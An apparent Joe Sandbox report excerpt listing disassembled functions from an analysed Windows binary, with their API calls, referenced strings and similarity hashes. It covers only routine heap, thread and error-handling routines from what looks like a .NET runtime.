Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Free$CloseHandleHeapLibraryTask
String ID:
API String ID: 4194648173-0
Opcode ID: 1895c257d44aecca741a1bd62a2d3ce45755ed20c6895fc227534fcbcd113114
Instruction ID: 91e991c1959df039448c70c3899a9f095f76ec838a3948e5a1df047eb82b6117
Opcode Fuzzy Hash: 1895c257d44aecca741a1bd62a2d3ce45755ed20c6895fc227534fcbcd113114
Instruction Fuzzy Hash: 75116070301509ABCB159F2AE858B7EB7ABBBC1311F184229E615C77E0CB74EC5597D0

Function 0071D720 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,0083858C), ref: 0071D74B
HeapFree.KERNEL32(00000000,?,00000000,00000000,ResumeThread,?,0083858C), ref: 0071D77E
HeapFree.KERNEL32(00000000,?,00000000,00000000,ResumeThread,?,0083858C), ref: 0071D7AE

Strings

ResumeThread, xrefs: 0071D723

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: ResumeThread
API String ID: 3298025750-947044025
Opcode ID: 35765fd794c35823e4d4309503df7dd24814de5221459361e7ab8f3b3f3513e9
Instruction ID: 4ea8c39e764894cad5a1d50fefec90a6e22a71667711942e4a206e8df4bbb817
Opcode Fuzzy Hash: 35765fd794c35823e4d4309503df7dd24814de5221459361e7ab8f3b3f3513e9
Instruction Fuzzy Hash: D4111C71201301DFE7309F1AE888B6AF7E9EF90714F24852EE995C36E0D7B5AC808B54

Function 007EB8B0 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON

Download Yara Rule

APIs

SetThreadErrorMode.KERNEL32(00008001,00000000), ref: 007EB8E9

Part of subcall function 009869D0: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 00986B21
Part of subcall function 009869D0: GetLastError.KERNEL32 ref: 00986B2F
Part of subcall function 009869D0: SetLastError.KERNEL32(00000000), ref: 00986C64

GetLastError.KERNEL32(00000000), ref: 007EB904
SetThreadErrorMode.KERNEL32(00000000,00000000), ref: 007EB91E
SetLastError.KERNEL32(00000000), ref: 007EB925

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Error$Last$ModeThread$LibraryLoad
String ID:
API String ID: 3861856538-0
Opcode ID: 85c4f4032d253838b6cd9276c7e372cdacacc78a6f26a62b4b033cd13f25036a
Instruction ID: 18930011f002cfcff0661a15577029486592e7079230fb473ea5fa880b005694
Opcode Fuzzy Hash: 85c4f4032d253838b6cd9276c7e372cdacacc78a6f26a62b4b033cd13f25036a
Instruction Fuzzy Hash: A8017571900259EFCB20DF99DD09BAEBBB8FB48725F10026AE915E33D0D7B55A048B91

Function 0087ED30 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(?,?,0000002C,?,00B7863C,?,?,?,?,?,?,?,?,?,BBFE6088,?), ref: 0087ED38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 0087ED45
SetLastError.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 0087ED58
SetLastError.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 0087ED6B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLast$FileSize
String ID:
API String ID: 3064237074-0
Opcode ID: 4ee46763e717dc7e3e28f7774fd7ce49e9217c1e67b5cb76bbbb999c1c56d603
Instruction ID: 6ede41f38a83f2ed1ed9628e8f5ded2007136945bb55ba45af91c0cae17f9c15
Opcode Fuzzy Hash: 4ee46763e717dc7e3e28f7774fd7ce49e9217c1e67b5cb76bbbb999c1c56d603
Instruction Fuzzy Hash: 2EE06D726012106AD670277CAC4979D6754FB89772F108765FAB6C10E0DB70C9449651

Function 00829D00 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00829DF3

Strings

{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 00829DE8, 00829EFD

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: _swprintf
String ID: {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
API String ID: 589789837-128308884
Opcode ID: b9ccfe406ebdc1a668a5a13a7e7abeed552e08ff2c10d8a385a2c7a9cf3b2201
Instruction ID: ef47434e11706841000621c51730366ed59baad92c689a629946d452d1e7754a
Opcode Fuzzy Hash: b9ccfe406ebdc1a668a5a13a7e7abeed552e08ff2c10d8a385a2c7a9cf3b2201
Instruction Fuzzy Hash: 817198B1E40358EFEB20CF94E949B9EBBB9FB08714F144029E955BB2C0CBB46945CB51

Function 008C4A40 Relevance: 5.4, APIs: 4, Instructions: 407memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 008C4C16
HeapFree.KERNEL32(00000000,?), ref: 008C505C
HeapFree.KERNEL32(00000000,?,BBFE6088,?,?), ref: 008C5075
HeapFree.KERNEL32(00000000,?,BBFE6088,?,?), ref: 008C508E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3e7e70f773d1c4561d7b8d1625e205d563780e80ff4b2cbe3fb8a86ad53233b4
Instruction ID: c0b4c6850c375edfd5be227e6d1d2ff1207f85ce83dff0d7331556e9e34c874b
Opcode Fuzzy Hash: 3e7e70f773d1c4561d7b8d1625e205d563780e80ff4b2cbe3fb8a86ad53233b4
Instruction Fuzzy Hash: 1B0237F1E012289BEB60CF14CC95B9EBBB4FB44314F1441E9EA09A7281D7759E84CF99

Function 0099C790 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0099C7C6

Strings

D::HIPCE: finished handling event, xrefs: 0099DF4A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CurrentThread
String ID: D::HIPCE: finished handling event
API String ID: 2882836952-1184478874
Opcode ID: a2f80562a0b29ee07ea73814b144b17246b0d903f36e35e6aadbbae7e14e4730
Instruction ID: c8b5e0b6959a7ae6a2fc78e09702b8a496820858b7036d458be1895bd4a7177c
Opcode Fuzzy Hash: a2f80562a0b29ee07ea73814b144b17246b0d903f36e35e6aadbbae7e14e4730
Instruction Fuzzy Hash: 8D41C4719162849FEF249F6CC8967AEBBB4AF15304F04016EE8159B283C7749944CB61

Function 00975D20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

CreateErrorInfo.OLEAUT32(?,BBFE6088,?,00000000,00000000), ref: 00975D86
SetErrorInfo.OLEAUT32(00000000,?,?,?,?,00000000,00000000), ref: 00975EA4

Strings

complib.hlp, xrefs: 00975E4B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorInfo$Create
String ID: complib.hlp
API String ID: 3127274525-2623185511
Opcode ID: 53a2a2e4481b0df10c56b571984a626ea3e2fc00e76c1fcedb29fcdd8f5cacfb
Instruction ID: 5e34b62a4519ef6ad4623545883572bb72fd519263053e84f643b3b36ef0cb69
Opcode Fuzzy Hash: 53a2a2e4481b0df10c56b571984a626ea3e2fc00e76c1fcedb29fcdd8f5cacfb
Instruction Fuzzy Hash: 674162B2A006199FCB00CF98D95476EBBB9EF48710F254069E405E7390CBB1AE01CBA1

Function 008D9AC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,missing,000000FF,?), ref: 008D9BD4

Strings

missing, xrefs: 008D9BC9
%d.%d.%d.%d, xrefs: 008D9BAB

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: wcsncpy_s
String ID: %d.%d.%d.%d$missing
API String ID: 3648202421-199071551
Opcode ID: 24bf4cab334a39429a127258642a5d01a237bb7e5096cebfba23eefd29eedeff
Instruction ID: 27f5875a7acb47b342ecc3273655d4d108bfae4805c0aed3a6271cc970fed1c1
Opcode Fuzzy Hash: 24bf4cab334a39429a127258642a5d01a237bb7e5096cebfba23eefd29eedeff
Instruction Fuzzy Hash: 55316D76900229AACB10DF94D880FFEB7B8FF08720F114297F955E7391E671AA01D7A5

Function 009A9CE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

Strings

DRCT::THTML:: wait set empty after sweep., xrefs: 009A9E03
DRCT::THTML:: Exiting., xrefs: 009A9E3A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID: DRCT::THTML:: Exiting.$DRCT::THTML:: wait set empty after sweep.
API String ID: 0-3898059428
Opcode ID: e962b8aaa10736be32e739ad3207c11d37d6d4fe6391165ca292493a1ba15b7a
Instruction ID: 1898b8c06cc3274d956d8a53e3fdd631cc0bb2f3b7d60c1dc86761f584264fec
Opcode Fuzzy Hash: e962b8aaa10736be32e739ad3207c11d37d6d4fe6391165ca292493a1ba15b7a
Instruction Fuzzy Hash: 57310970A04205AFEF20DB64C985BAEBBE8FF56710F644169F904977C2EB759C40CBA1

Function 008D94E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009865E0: GetModuleFileNameW.KERNEL32(00710000,00000000), ref: 00986666
Part of subcall function 009865E0: GetLastError.KERNEL32 ref: 00986697
Part of subcall function 009865E0: SetLastError.KERNEL32(00000000,00000000), ref: 009867A1

wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,missing,000000FF,BBFE6088,?), ref: 008D95ED
HeapFree.KERNEL32(00000000,?), ref: 008D9619

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

Strings

missing, xrefs: 008D95E4

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast$FileModuleNamewcsncpy_s
String ID: missing
API String ID: 2985110451-4037049305
Opcode ID: 1f455807bf8190bc8b4952b741766eff0c791fb9f1e0d2c0427e516847e60f3a
Instruction ID: 753eedb9a5d9de7eabd74b35d2dc593efa02d1875350d19f48d4d4117fa49209
Opcode Fuzzy Hash: 1f455807bf8190bc8b4952b741766eff0c791fb9f1e0d2c0427e516847e60f3a
Instruction Fuzzy Hash: 98318DB19012189BDB24DF14DC46BDAB7B4FF09320F1082A9E949A73C1DB74AE54CFA5

Function 009844B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0096F3E0: GetProcessHeap.KERNEL32(00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?,00000002), ref: 0096F3EC
Part of subcall function 0096F3E0: HeapAlloc.KERNEL32(03400000,00000000,?,00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?), ref: 0096F408

GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00984553
HeapFree.KERNEL32(00000000,00000000,BBFE6088), ref: 00984587

Strings

D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 009844C5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocFileFreeModuleNameProcess
String ID: D:\a\_work\1\s\src\coreclr\vm\threads.cpp
API String ID: 316127365-1819033804
Opcode ID: 26ed9e53289fe3baadcd8c5869460d51707709501d5b40b9e34d461531fcacc6
Instruction ID: 4e7e668ff2d6cb982f685f380649354c0c097d6e479a8342f1aacfed10ee52b9
Opcode Fuzzy Hash: 26ed9e53289fe3baadcd8c5869460d51707709501d5b40b9e34d461531fcacc6
Instruction Fuzzy Hash: B72168B090034ADBDB00CF95C909BAEBBB4FB44314F104219E524A7390DBB916048B91

Function 00A2A7D0 Relevance: 5.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,00000000,00000000,?), ref: 00A2A8CD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,?,?,?,?,?,00000000,00000000,?), ref: 00A2AB52
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A2AB88

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3881570dd927cd5bbf3c4027109f9f5d9e1ef2c38a5cd1dcb27d0f528ed3fb1a
Instruction ID: 32f4a3dd47286a680a741ad1a7473dac527d0106928ae99f52638a4291b562cd
Opcode Fuzzy Hash: 3881570dd927cd5bbf3c4027109f9f5d9e1ef2c38a5cd1dcb27d0f528ed3fb1a
Instruction Fuzzy Hash: FFB11DB4E002288FDB20DF19D980799B7B6FF99310F1581E9E849A7351DB329EA1CF41

Function 00A2BC00 Relevance: 5.3, APIs: 4, Instructions: 256COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,?,?), ref: 00A2BCCC
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,?,?), ref: 00A2BF83

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c7faf5989262a83f59e4b143754a734aab32ffc17d9430bb754d81b0d692b1f7
Instruction ID: 3451f1f143a51dde2be9bb6cfcf110d410c2a6664d9126f1f8c870fdcee998d1
Opcode Fuzzy Hash: c7faf5989262a83f59e4b143754a734aab32ffc17d9430bb754d81b0d692b1f7
Instruction Fuzzy Hash: CDB14B75A107258FCB26CF19D9807A9B7B8FF48700F1481E9E9096B351DB31AE84CF90

Function 007DA660 Relevance: 5.2, APIs: 4, Instructions: 227memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,BBFE6088,00000000,00000138,?,?), ref: 007DA713
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000138,?,?), ref: 007DA76C
HeapFree.KERNEL32(00000000,?,?), ref: 007DA8C7
LeaveCriticalSection.KERNEL32(00DAB094,?,?,?,?,?,?,?,?,?), ref: 007DA8F6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
